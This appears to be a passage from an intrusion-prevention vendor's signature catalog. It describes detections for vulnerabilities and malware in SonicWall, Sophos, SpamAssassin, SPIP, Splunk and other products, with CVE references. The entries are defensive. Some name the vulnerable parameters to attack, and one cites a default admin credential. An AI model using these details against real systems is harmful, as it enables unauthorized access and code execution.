Description: An authentication bypass vulnerability has been reported in multiple SonicWall products. The vulnerability allows a user to send a request to the appliance management interface with the parameter none zero skipSessionCheck value. This will allow the user to bypass authentication. A remote user can exploit this vulnerability to gain full access to the vulnerable system.
Situation: HTTP_CRL-SonicWall-Multiple-Products-Authentication-Bypass
References:
CVE-2013-1359
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1359
BID-57445
http://www.securityfocus.com/bid/57445
OSVDB-89347
http://www.osvdb.org/89347
Back to top

SonicWall-Remote-Code-Execution-CVE-2021-20038

About this vulnerability: An attempt to exploit a vulnerability in SonicWall
Risk: High
First detected in: sgpkg-ips-1429-5242
Last changed: sgpkg-ips-1429-5242
Platform: Generic
Software: SonicWall
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability has been reported in the web interface of SonicWall SMA 100 series. An unauthenticated attacker can exploit this vulnerability via crafted HTTP requests. A successful attack can allow arbitrary code execution with the 'nobody' privileges.
Situation: HTTP_CSU-SonicWall-Remote-Code-Execution-CVE-2021-20038
References:
CVE-2021-20038
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20038
Back to top

SonicWall-Secure-Mobile-Access-Arbitrary-File-Deletion

About this vulnerability: An attempt to exploit a vulnerability in SonicWall Mobile Access detected
Risk: High
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1396-5242
Platform: Generic
Software: SonicWall Mobile Access
Type: Malfunction
Description: An attempt to exploit a vulnerability in SonicWall Mobile Access detected.
Situation: HTTP_CSU-SonicWall-Secure-Mobile-Access-Arbitrary-File-Deletion
References:
CVE-2021-20034
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20034
Back to top

SonicWall-SMA100-SQL-Injection

About this vulnerability: An attempt to exploit a vulnerability in SonicWall SMA100 detected
Risk: High
First detected in: sgpkg-ips-1408-5242
Last changed: sgpkg-ips-1408-5242
Platform: Generic
Software: SonicWall
Type: Malfunction
Description: An attempt to exploit a vulnerability in SonicWall SMA100 detected.
Situation: HTTP_CRL-SonicWall-SMA100-SQL-Injection
References:
CVE-2019-7481
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7481
Back to top

SonicWall-SSL-VPN-End-Point-Interrogator-Installer-ActiveX-Control

About this vulnerability: A vulnerability in SonicWALL SSL-VPN End-Point Interrogator/Installer ActiveX Control
Risk: High
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SonicWall SSL-VPN
Type: Format String
Description: There exists a code execution vulnerability in SonicWALL SSL-VPN End-Point Interrogator/Installer ActiveX controls.
Situation: HTTP_SS-SonicWall-SSL-VPN-End-Point-Interrogator-Installer-ActiveX-Control
File-Text_SonicWall-SSL-VPN-End-Point-Interrogator-Installer-ActiveX-Control
Back to top

SonicWall-SSL-VPN-NetExtender-NELaunchCtrl-ActiveX-Control-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in SonicWall SSL-VPN NetExtender
Risk: High
First detected in: sgpkg-ips-133-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: SonicWall SSL-VPN NetExtender
Type: Malfunction
Description: There is a buffer overflow vulnerability in SonicWall SSL-VPN NetExtender. The vulnerability allows arbitary code execution in the context of the current user.
Situation: HTTP_SS-SonicWall-SSL-VPN-NetExtender-NELaunchCtrl-ActiveX-Control-BOF
File-Text_SonicWall-SSL-VPN-NetExtender-NELaunchCtrl-ActiveX-Control-BOF
References:
CVE-2007-5603
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5603
BID-26288
http://www.securityfocus.com/bid/26288
Back to top

SonicWall-SSLVPN-Session-Hijacking-CVE-2024-53704

About this vulnerability: An attempt to exploit a vulnerability in SonicWall SSLVPN detected
Risk: High
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1838-5242
Platform: Generic
Software: SonicWall SSL-VPN
Type: Input Validation
Description: An improper authentication vulnerability in the SonicWall SSLVPN's authentication mechanism allows a remote attacker to hijack active SSLVPN sessions and gain unauthorized network access.
Situation: HTTP_CSU-SonicWall-SSLVPN-Session-Hijacking-CVE-2024-53704
HTTP_CSH-SonicWall-SSLVPN-Session-Hijacking-CVE-2024-53704
References:
CVE-2024-53704
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-53704
Back to top

SonicWall-Stack-Buffer-Overflow-CVE-2022-22274

About this vulnerability: A vulnerability in SonicWall
Risk: High
First detected in: sgpkg-ips-1676-5242
Last changed: sgpkg-ips-1676-5242
Platform: Generic
Software: SonicWall
Type: Buffer Overflow
Description: A buffer overflow vulnerability has been reported in SonicOS. An unauthenticated remote attacker can use this vulnerability to cause a denial of service condition or potentially execute code via a crafted HTTP request.
Situation: HTTP_CS-SonicWall-Stack-Buffer-Overflow-CVE-2022-22274
References:
CVE-2022-22274
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22274
Back to top

SonicWall-Stack-Buffer-Overflow-CVE-2023-0656

About this vulnerability: A vulnerability in SonicWall
Risk: High
First detected in: sgpkg-ips-1676-5242
Last changed: sgpkg-ips-1676-5242
Platform: Generic
Software: SonicWall
Type: Buffer Overflow
Description: A buffer overflow vulnerability has been reported in SonicOS. An unauthenticated remote attacker can use this vulnerability to cause a denial of service condition or potentially execute code via a crafted HTTP request.
Situation: HTTP_CS-SonicWall-Stack-Buffer-Overflow-CVE-2023-0656
References:
CVE-2023-0656
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0656
Back to top

Sophos-Anti-Virus-Cab-File-Invalid-Folder-Count-Heap-Overflow

About this vulnerability: A vulnerability in Sophos Anti-Virus
Risk: Moderate
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sophos Anti-Virus
Type: Malfunction
Description: There exists a heap overflow vulnerability in Sophos Anti-Virus as well as many other Sophos products that embed it. The vulnerability exists in the component that handles Microsoft CAB compressed files. A remote unauthenticated attacker can exploit the vulnerability causing a denial of service condition or the execution of arbitrary code within the security context of the Anti-Virus service, normally System. In a simple attack case aimed at creating a denial of service condition, the on-demand Sophos Anti-Virus console will freeze, the Sophos Anti-Virus service and on-access scanning functionality will also stop working. The service and all other Anti-Virus functions will not resume until the target computer is restarted or the "Sophos Anti-Virus" service is restarted manually. Note that in order to restart the service, the SavService.exe process needs to be terminated if it is still being executed. Furthermore, the application that calls Sophos Anti-Virus, such as Windows Explorer, may also freeze on accessing the malformed CAB files. In a more sophisticated attack scenario, where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature the injected code. Any code injected into the vulnerable component would execute in the security context of the affected service, normally System.
Situation: File-Binary_Sophos-Anti-Virus-Cab-File-Invalid-Folder-Count-Heap-Overflow
References:
CVE-2006-0994
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0994
BID-17876
http://www.securityfocus.com/bid/17876
Back to top

Sophos-Anti-Virus-PDF-Handling-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Sophos Threat Detection Engine
Risk: High
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sophos Anti-Virus
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in Sophos Anti-Virus and Endpoint Protection. The vulnerability is due to the handling of encrypted PDF files. A remote attacker could exploit this vulnerability by causing Sophos Anti-Virus to process a specially crafted PDF file. Successful exploitation could result in arbitrary code execution in the context of the affected service, which is SYSTEM by default.
Situation: File-PDF_Sophos-Anti-Virus-PDF-Handling-Stack-Buffer-Overflow
References:
OSVDB-87060
http://www.osvdb.org/87060
Back to top

Sophos-Anti-Virus-Reserved-Device-Name-Handling

About this vulnerability: A vulnerability in Sophos Anti-Virus
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Sophos Anti-Virus
Type: Input Validation
Description: A vulnerability in Sophos Anti-Virus may allow malicious code to evade detection. The vulnerability is caused by a design issue concerning the scanning of special device file names on the Windows platforms. This flaw can be exploited by malicious users as a method of bypassing the Sophos virus detection.
Situation: E-Mail_HCS-Sophos-Anti-Virus-Reserved-Device-Name-Handling
References:
CVE-2004-0552
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0552
BID-11236
http://www.securityfocus.com/bid/11236
Back to top

Sophos-Anti-Virus-Visio-File-Parsing-Buffer-Overflow

About this vulnerability: A vulnerability in Sophos Anti-Virus
Risk: Low
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sophos Anti-Virus; Sophos MailMonitor; Sophos Pure Message
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in the Visio file scanning component of Sophos Anti-Virus. The vulnerability is caused by the lack of proper boundary verification of user supplied data. By sending a crafted Visio file to a target running the vulnerable product, a remote attacker can exploit this vulnerability to cause a denial-of-service or to inject and execute arbitrary code. Any code injected will be executed within the security context of the Anti-Virus service, normally System. In a simple attack case aimed at creating a denial of service condition, the on-demand Sophos Anti-Virus console will freeze, the Sophos Anti-Virus service and on-access function will also stop working. The service and whole Anti-Virus functions will not resume until the target computer is restarted. Note the application that calls Sophos Anti-Virus, such as Explorer, may also freeze on accessing the malformed Visio Binary files. In a more sophisticated attack scenario, where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature the injected code. Any code injected into the vulnerable component would execute in the security context of the affected process.
Situation: File-OLE_Sophos-Anti-Virus-Visio-File-Parsing-Buffer-Overflow
References:
CVE-2005-2768
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2768
BID-14362
http://www.securityfocus.com/bid/14362
Back to top

Sophos-Firewall-Authentication-Bypass-CVE-2022-1040

About this vulnerability: A vulnerability in Sophos Firewall
Risk: High
First detected in: sgpkg-ips-1478-5242
Last changed: sgpkg-ips-1478-5242
Platform: Generic
Software: Sophos Firewall
Type: Malfunction
Description: An authentication bypass vulnerability has been reported in the Sophos Firewall User Portal and Webadmin.
Situation: HTTP_CRL-Sophos-Firewall-Authentication-Bypass-CVE-2022-1040
References:
CVE-2022-1040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1040
Back to top

Sophos-Firewall-User-Portal-And-WebAdmin-Code-Injection

About this vulnerability: A vulnerability in Sophos XG Firewall
Risk: Moderate
First detected in: sgpkg-ips-1510-5242
Last changed: sgpkg-ips-1510-5242
Platform: Sophos XG Firewall
Software: <os>
Type: Input Validation
Description: Improper validation of JSON keys submitted to the Controller endpoint of the Sophos XG Firewall causes a code injection vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target.
Situation: File-Text_Sophos-Firewall-User-Portal-And-WebAdmin-Code-Injection
References:
CVE-2022-3236
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3236
Back to top

Sophos-UTM-WebAdmin-Sid-Command-Injection

About this vulnerability: A vulnerability in Sophos UTM WebAdmin.
Risk: High
First detected in: sgpkg-ips-1401-5242
Last changed: sgpkg-ips-1401-5242
Platform: Linux; Unix
Software: Sophos Web Appliance
Type: Input Validation
Description: A vulnerability in Sophos UTM WebAdmin, versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11, which allows remote attackers to execute arbitrary commands due to the insuffiecient validation of the SID object value.
Situation: File-Text_Sophos-UTM-WebAdmin-Sid-Command-Injection
References:
CVE-2020-25223
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25223
Back to top

Sophos-Web-Appliance-Change_password-Admin-Password-Privilege-Escalation

About this vulnerability: A vulnerability in Sophos Web Appliance
Risk: High
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sophos Web Appliance
Type: Malfunction
Description: A privilege escalation vulnerability exists in Sophos Web Appliance. The vulnerability is due to errors in a change_password request when handling user input. A remote authenticated attacker could exploit this vulnerability by placing specially crafted data in a change_password request. Successful exploitation could allow an attacker to change the admin's password.
Situation: HTTP_CRL-Sophos-Web-Appliance-Change_password-Admin-Password-Privilege-Escalation
References:
CVE-2014-2849
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2849
BID-66734
http://www.securityfocus.com/bid/66734
OSVDB-105635
http://www.osvdb.org/105635
Back to top

Sophos-Web-Appliance-Command-Injection-CVE-2023-1671

About this vulnerability: A vulnerability in Sophos Web Appliance
Risk: High
First detected in: sgpkg-ips-1672-5242
Last changed: sgpkg-ips-1672-5242
Platform: Generic
Software: Sophos Web Appliance
Type: Input Validation
Description: An unauthenticated command injection vulnerability has been reported in Sophos Web Appliance versions prior to 4.3.10.4.
Situation: HTTP_CRL-Sophos-Web-Appliance-Command-Injection-CVE-2023-1671
References:
CVE-2023-1671
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1671
Back to top

Sophos-Web-Appliance-Directory-Traversal

About this vulnerability: A Sophos-Web-Appliance-Directory-Traversal vulnerability.
Risk: High
First detected in: sgpkg-ips-700-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sophos Web Appliance
Type: Directory Traversal
Description: A directory traversal vulnerability in Sophos Web Application, versions before 3.7.8.2, which allows remote attackers to read arbitrary files via the id parameter.
Situation: HTTP_CSU-System-File-Disclosure
References:
CVE-2013-2641
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2641
BID-58833
http://www.securityfocus.com/bid/58833
Back to top

Sophos-Web-Appliance-Remote-Command-Execution

About this vulnerability: A Sophos Web Appliance Remote Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-700-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sophos Web Appliance
Type: Input Validation
Description: A vulnerability in Sophos Web Appliance, versions 3.7.9.1 and 3.8.1.1, which allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter of end-user/index.php.
Situation: HTTP_CRL_Sophos-Web-Appliance-Remote-Command-Execution
References:
CVE-2013-4983
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4983
BID-62263
http://www.securityfocus.com/bid/62263
Back to top

Sophos-Web-Appliance-Sophosconfig-Write-Command-Execution

About this vulnerability: A vulnerability in Sophos Web Appliance
Risk: Moderate
First detected in: sgpkg-ips-579-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sophos Web Appliance
Type: Malfunction
Description: A command execution vulnerability exists in Sophos Web Appliance. The vulnerability is due to an error in the sanitization function. A remote authenticated attacker could exploit this vulnerability by placing specially crafted data in a request. Successful exploitation could allow an attacker to execute arbitrary OS commands with root privileges.
Situation: HTTP_CRL-Sophos-Web-Appliance-Sophosconfig-Write-Command-Execution
References:
CVE-2014-2850
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2850
BID-66734
http://www.securityfocus.com/bid/66734
OSVDB-105636
http://www.osvdb.org/105636
Back to top

Sophos-XG-Firewall-Pre-Auth-SQL-Injection

About this vulnerability: An attempt to exploit a vulnerability in Sophos XG Firewall detected
Risk: High
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1406-5242
Platform: Sophos XG Firewall
Software: <os>
Type: Malfunction
Description: An attempt to exploit a vulnerability in Sophos XG Firewall detected.
Situation: HTTP_CRL-Sophos-XG-Firewall-Pre-Auth-SQL-Injection
References:
CVE-2020-12271
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12271
Back to top

Sophosencrypt-Ransomware

About this vulnerability: A transfer of SophosEncrypt ransomware executable detected
Risk: High
First detected in: sgpkg-ips-1860-5242
Last changed: sgpkg-ips-1860-5242
Platform: Windows
Software: SophosEncrypt
Type: Backdoor
Description: SophosEncrypt ransomware file transfer.
Situation: File-Exe_Sophosencrypt-Ransomware
Back to top

SoreFang-Malware-Infection-Traffic

About this vulnerability: SoreFang malware infection traffic detected
Risk: High
First detected in: sgpkg-ips-1373-5242
Last changed: sgpkg-ips-1373-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: SoreFang malware infection traffic was detected.
Situation: HTTP_CS-SoreFang-Malware-Infection-Traffic
Back to top

SoulSeek-Peer-To-Peer-Network-Usage

About this vulnerability: SoulSeek peer-to-peer network usage
Risk: Moderate
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SoulSeek
Type: Peer-to-Peer
Description: Soulseek is a peer-to-peer network that can be used to share files. File sharing can expose to security risks if unintentionally sharing confidential files or downloading files that contain malicious content such as viruses, worms, or backdoors.
Situation: HTTP_CSH-P2P-SoulSeek-Client
P2P-TCP_SoulSeek-Network-Connect
Back to top

Sourcefire-Snort-Rule20275eval-Buffer-Overflow

About this vulnerability: A vulnerability in Sourcefire Snort
Risk: High
First detected in: sgpkg-ips-528-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Snort
Type: Buffer Overflow
Description: A buffer overflow vulnerability has been reported in a pre-compiled Snort rule distributed by Sourcefire. The vulnerability is due to a stack buffer overflow in rule 3:20275. A remote unauthenticated attacker can leverage this vulnerability to achieve arbitrary code execution on a target system.
Situation: MSRPC_SS-Sourcefire-Snort-Rule20275eval-Buffer-Overflow
Back to top

Sourcegraph-gitserver-sshCommand-RCE

About this vulnerability: A vulnerability in the Sourcegraph gitserver component.
Risk: High
First detected in: sgpkg-ips-1499-5242
Last changed: sgpkg-ips-1499-5242
Platform: Unix;Linux
Software: Sourcegraph
Type: Input Validation
Description: A vulnerability in the Sourcegraph gitserver component, versions before 3.37.0, which allows remote attackers to execute arbitrary commands by modifying the core.sshCommand value within the git configuration.
Situation: File-Text_Sourcegraph-gitserver-sshCommand-RCE
References:
CVE-2022-23642
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23642
Back to top

SpamAssassin-Long-Message-Header-DoS

About this vulnerability: A vulnerability in SpamAssassin
Risk: High
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: SpamAssassin
Type: Resource Starvation
Description: There exists a remote denial of service vulnerability in Apache SpamAssassin. The vulnerability is caused by an inefficient method used in email header parsing. An attacker can exploit the vulnerability by sending a malicious email that contains crafted headers. This can cause the affected application to terminate.
Situation: E-Mail_HCS-SpamAssassin-Long-Message-Header-DoS
References:
CVE-2005-3351
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3351
BID-15373
http://www.securityfocus.com/bid/15373
OSVDB-11581
http://www.osvdb.org/11581
Back to top

SpamAssassin-Malformed-Message-DoS

About this vulnerability: A vulnerability in SpamAssassin
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1495-5242
Platform: Generic
Software: SpamAssassin
Type: Malfunction
Description: There exists a vulnerability in the way SpamAssassin parses a specially crafted messages. An attacker exploiting this vulnerability can increase the likelihood of an e-mail address being block listed. If successful, legitimate messages from the e-mail address will be considered to be spam by the vulnerable product.
Situation: File-Text_SpamAssassin-Malformed-Message-DoS
References:
BID-10898
http://www.securityfocus.com/bid/10898
Back to top

SpamAssassin-Milter-Plugin-Shell-Command-Injection

About this vulnerability: A command injection vulnerability in SpamAssassin Milter Plugin
Risk: High
First detected in: sgpkg-ips-295-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: SpamAssassin Milter Plugin
Type: Malfunction
Description: There is a command injection vulnerability in SpamAssassin Milter Plugin. A remote attacker can exploit this vulnerability to execute arbitrary shell commands with root privileges.
Situation: SMTP_SpamAssassin-Milter-Plugin-Shell-Command-Injection
References:
BID-38578
http://www.securityfocus.com/bid/38578
OSVDB-62809
http://www.osvdb.org/62809
Back to top

SpamAssassin-Spamd-Vpopmail-And-Paranoid-Options-Code-Execution

About this vulnerability: Code execution vulnerability in the handling of the username string in SpamAssasin
Risk: Moderate
First detected in: sgpkg-ips-70-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SpamAssassin
Type: Code Injection
Description: There is a code execution vulnerability in the handling of the username string in SpamAssasin. A successful exploitation of this vulnerability requires the Vpopmail and Paranoid options to be enabled and leads to arbitrary code execution with the privileges of the SpamAssassin spamd daemon process.
Situation: Generic_SpamAssassin-Spamd-Vpopmail-And-Paranoid-Options-Code-Execution
References:
CVE-2006-2447
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2447
BID-18290
http://www.securityfocus.com/bid/18290
OSVDB-26177
http://www.osvdb.org/26177
Back to top

SpamTitan-Unauthenticated-RCE

About this vulnerability: An attempt to exploit a vulnerability in SpamTitan
Risk: High
First detected in: sgpkg-ips-1341-5242
Last changed: sgpkg-ips-1341-5242
Platform: Generic
Software: SpamTitan
Type: Input Validation
Description: There exists a vulberability in SpamTitan, versions .01, 7.02, 7.03 and 7.07, which allows remote attacker to execute arbitrary commands by sending a crafted request to snmp-x.php which is appended to the snmpd.conf file by the application and executed.
Situation: HTTP_CRL-SpamTitan-Unauthenticated-RCE
References:
CVE-2020-11698
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11698
Back to top

Spectre-Side-Channel-Attack-JavaScript

About this vulnerability: Spectre side-channel attack detected
Risk: Moderate
First detected in: sgpkg-ips-1034-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Javascript Injection
Description: A page was accessed that tries to exploit Spectre side channel vulnerability. A remote attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead in information disclosure.
Situation: File-Text_Spectre-Side-Channel-Attack-JavaScript
References:
CVE-2017-5715
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5715
Back to top

SPIP-BigUp-Plugin-Unauthenticated-RCE

About this vulnerability: An attempt to exploit a vulnerability in the BigUp plugin of SPIP detected
Risk: High
First detected in: sgpkg-ips-1779-5242
Last changed: sgpkg-ips-1779-5242
Platform: Windows; Unix; Linux
Software: SPIP
Type: Input Validation
Description: A vulnerability in the BigUp plugin of SPIP, versions before 4.3.2, 4.2.16, and 4.1.18, which allows remote attackers to execute arbitrary code through the name parameter, by sending a crafted multipart file upload HTTP request with the bigup_retrouver_fichiers parameter set to any value.
Situation: HTTP_CS-SPIP-BigUp-Plugin-Unauthenticated-RCE
References:
CVE-2024-8517
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8517
Back to top

SPIP-Form-PHP-Injection

About this vulnerability: An attempt to exploit a vulnerability in SPIP detected
Risk: High
First detected in: sgpkg-ips-1657-5242
Last changed: sgpkg-ips-1657-5242
Platform: Generic
Software: SPIP
Type: Input Validation
Description: A vulnerability in SPIP, versions before 3.2.18, before 4.0.10, before 4.1.18 and before 4.2.1, which allows remote attackers to execute arbitrary PHP code via the oubli parameter.
Situation: HTTP_CRL-SPIP-Form-PHP-Injection
References:
CVE-2023-27372
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27372
Back to top

SPIP-Porte-Plume-Plugin-RCE

About this vulnerability: An attempt to exploit a vulnerability in SPIP
Risk: Moderate
First detected in: sgpkg-ips-1769-5242
Last changed: sgpkg-ips-1769-5242
Platform: Generic
Software: SPIP
Type: Input Validation
Description: Improper validation of request contents causes a code injection vulnerability in SPIP. A successful exploitation allows an attacker to execute arbitrary code on the target system.
Situation: File-Text_SPIP-Porte-Plume-Plugin-RCE
Back to top

Splunk-Collect-File-Directory-Traversal

About this vulnerability: A vulnerability in Splunk Splunk
Risk: Moderate
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Splunk
Type: Input Validation
Description: A directory traversal vulnerability has been found in Splunk. The vulnerability is due to insufficient sanitization of user-provided input to the advanced search functionality in the "file" parameter of the "collect" script. A remote attacker could exploit this vulnerability either by enticing an authenticated user to open a malicious page or by obtaining credentials and submitting an HTTP request. In the case of successful exploitation, a file could be written to the file system with the privileges of the affected application. This could possibly be leveraged to achieve code execution.
Situation: HTTP_CSU-Splunk-Collect-File-Directory-Traversal
References:
CVE-2013-6771
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6771
BID-62632
http://www.securityfocus.com/bid/62632
OSVDB-97720
http://www.osvdb.org/97720
Back to top

Splunk-Edit_User-Capability-Privilege-Escalation

About this vulnerability: An attempt to exploit a vulnerability in Splunk detected
Risk: High
First detected in: sgpkg-ips-1659-5242
Last changed: sgpkg-ips-1659-5242
Platform: Linux;Windows
Software: Splunk
Type: Input Validation
Description: A vulnerability in Splunk, versions before 9.0.5, 8.2.11, and 8.1.14, which allows low-privileged users to escalate their privileges to that of the admin user by providing a specially crafted web request due to the "edit_user" capability not honoring the "grantableRoles" setting in the authorize.conf.
Situation: HTTP_CRL-Splunk-Edit_User-Capability-Privilege-Escalation
References:
CVE-2023-32707
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32707
Back to top

Splunk-Enterprise-Alerts_Id-Server-Side-Request-Forgery

About this vulnerability: A vulnerability in Splunk Enterprise
Risk: Moderate
First detected in: sgpkg-ips-900-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Splunk
Type: Input Validation
Description: Improper validation of the alerts_id parameter in HTTP requests sent to Splunk Enterprise causes a server-side request forgery vulnerability. A successful exploitation allows a remote attacker to obtain the user's API token.
Situation: HTTP_CRL-Splunk-Enterprise-Alerts_Id-Server-Side-Request-Forgery
Back to top

Splunk-Enterprise-Code-Execution-CVE-2023-46214

About this vulnerability: A vulnerability in Splunk Enterprise
Risk: High
First detected in: sgpkg-ips-1657-5242
Last changed: sgpkg-ips-1657-5242
Platform: Generic
Software: Splunk
Type: Input Validation
Description: A code execution vulnerability has been reported in Splunk Enterprise versions before 9.0.7 and 9.1.2. This vulnerability is due to a failure to safely sanitize user-provided extensible stylesheet language transformations.
Situation: File-TextId_Splunk-Enterprise-Code-Execution-CVE-2023-46214
References:
CVE-2023-46214
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46214
Back to top

Splunk-Enterprise-Data-Model-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Splunk Enterprise.
Risk: High
First detected in: sgpkg-ips-1533-5242
Last changed: sgpkg-ips-1533-5242
Platform: Windows;Linux
Software: Splunk
Type: Input Validation
Description: A vulnerability in Splunk Enterprise, versions 8.1.11 and lower, 8.2.0 to 8.2.8, 9.0.0 to 9.0.1, which allows remote attackers to execute arbitrary code by sending a crafted request to the target server, due to improper encoding of fields provided by users when creating or editing data models.
Situation: HTTP_CRL-Splunk-Enterprise-Data-Model-Stored-Cross-Site-Scripting
References:
CVE-2022-43569
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43569
Back to top

Splunk-Enterprise-Module_Resolver-Directory-Traversal

About this vulnerability: A vulnerability in Splunk Enterprise
Risk: Moderate
First detected in: sgpkg-ips-1753-5242
Last changed: sgpkg-ips-1753-5242
Platform: Generic
Software: Splunk
Type: Directory Traversal
Description: Improper validation of request URIs sent to the "/modules" endpoint causes a directory traversal vulnerability in Splunk. A successful exploitation allows an attacker to read arbitrary files on the target system.
Situation: HTTP_CRL-Splunk-Enterprise-Module_Resolver-Directory-Traversal
References:
CVE-2024-36991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36991
Back to top

Splunk-Enterprise-Radio-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in Splunk
Risk: Moderate
First detected in: sgpkg-ips-1535-5242
Last changed: sgpkg-ips-1535-5242
Platform: Generic
Software: Splunk
Type: Input Validation
Description: Insufficient validation of user data in the radio.html template causes a cross-site scripting vulnerability in Splunk. A successful exploit allowsa an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Splunk-Enterprise-Radio-Reflected-Cross-Site-Scripting
References:
CVE-2022-43568
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43568
Back to top

Splunk-Enterprise-Splunk-App-For-Lookup-File-Editing-Directory-Traversal

About this vulnerability: A vulnerability in Splunk App for Lookup File Editing
Risk: High
First detected in: sgpkg-ips-1604-5242
Last changed: sgpkg-ips-1604-5242
Platform: Generic
Software: Splunk
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in the Splunk App for Lookup File Editing. The vulnerability is due to insufficient validation of user data used in directory names. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the disclosure of arbitrary files in the Splunk installation directory on the target server, or in the worst case, an attacker writing arbitrary files in the Splunk installation directory that could lead to arbitrary code execution under the security context of SYSTEM.
Situation: HTTP_CSU-Splunk-Enterprise-Splunk-App-For-Lookup-File-Editing-Directory-Traversal
HTTP_CRL-Splunk-Enterprise-Splunk-App-For-Lookup-File-Editing-Directory-Traversal
References:
CVE-2023-32714
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32714
Back to top

Splunk-Search-Remote-Code-Execution

About this vulnerability: A Splunk Search Remote Code Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Splunk
Type: PHP Injection
Description: A vulnerability in Splunk, versions 4.2.x before 4.2.5, that allows remote attackers to execute remote commands via the mappy search command. This fingerprint also covers the default admin password admin:changeme.
Situation: HTTP_CRL-Splunk-Search-Remote-Code-Execution
References:
CVE-2011-4642
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4642
BID-51061
http://www.securityfocus.com/bid/51061
Back to top

Spotify-Usage

About this vulnerability: Spotify usage detected
Risk: Moderate
First detected in: sgpkg-ips-219-3038
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Spotify
Type: Peer-to-Peer
Description: Spotify is an proprietary streaming peer-to-peer application for listening to music online.
Situation: Analyzer_Spotify-Usage
Generic_UDP-Spotify-UDP-Traffic
DNS-UDP_Spotify-Server-Query
